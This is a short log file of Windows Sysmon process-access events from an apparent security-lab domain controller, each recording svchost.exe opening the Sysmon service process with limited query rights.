{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1392,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1393,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1394,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1395,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1396,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1397,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1398,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1399,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
